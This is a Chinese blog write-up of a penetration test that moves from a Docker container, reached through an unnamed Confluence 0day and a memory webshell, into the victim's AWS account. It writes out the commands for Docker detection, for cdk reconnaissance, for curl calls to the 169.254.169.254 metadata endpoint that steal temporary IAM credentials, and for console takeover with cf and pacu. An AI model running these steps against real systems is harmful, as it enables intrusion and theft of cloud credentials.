记一次由私有云到公有云渗透

admin 2023年7月24日14:02:06评论25 views字数 846阅读2分49秒阅读模式
Powered By HashRun安全团队-T4x0r

入口

confluence组件0day

https://xxxx.xxx.xxxx/
shell地址:
https://xxx.xxx.xxx/
内存🐎

记一次由私有云到公有云渗透

whoami查看下权限

记一次由私有云到公有云渗透

id查看下

记一次由私有云到公有云渗透

发现权限有些低,还行
然后ps一下看下进程

记一次由私有云到公有云渗透

发现存在docker进程,下意识的判断下我是不是在docker里
查看docker命令是:

ls -alh /.dockerenvcat /proc/1/cgroup | grep "docker"

记一次由私有云到公有云渗透

记一次由私有云到公有云渗透

确实是docker无疑了

私有云渗透转战公有云渗透

私有云渗透

先上传cdk进行信息收集一波

./cdk1 evaluate --full

记一次由私有云到公有云渗透

发现有aws云,以及元数据地址,之前本来想打私有云,但是看了一下下面的信息收集结果发现docker的cve也全修了,docker错配懒的看,因为前天喝酒了,有点难受,懒的去看错配了
转变一下思维,如果我拿到他控制台,那不就等于逃逸出他整个docker并且有最高权限了嘛
所以开始打公有云

公有云渗透

现在面临的问题是没凭据,但是aws元数据地址是固定的,所有云都有元数据地址,那我们我们就可以去申请临时凭据,然后去操作,只不过有时效性
aws的元数据地址是:

http://169.254.169.254/latest/meta-data/

然后获取临时凭据STS

curl http://169.254.169.254/latest/meta-data/iam/security-credentials -w 'n'

记一次由私有云到公有云渗透

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/xxxx -w 'n'

记一次由私有云到公有云渗透

记一次由私有云到公有云渗透

这里cf不能接管,所以可以查看一下信息

cf aws ec2 ls

记一次由私有云到公有云渗透

所以对于aws云渗透我们会使用pacu工具
简单配置下,然后直接
console命令接管

记一次由私有云到公有云渗透

记一次由私有云到公有云渗透

暂时到这里结束,后续还在看,谁会在节假日加班呢

记一次由私有云到公有云渗透

原文始发于微信公众号(T大4的小圈圈):记一次由私有云到公有云渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月24日14:02:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次由私有云到公有云渗透https://cn-sec.com/archives/1899372.html

发表评论

匿名网友 填写信息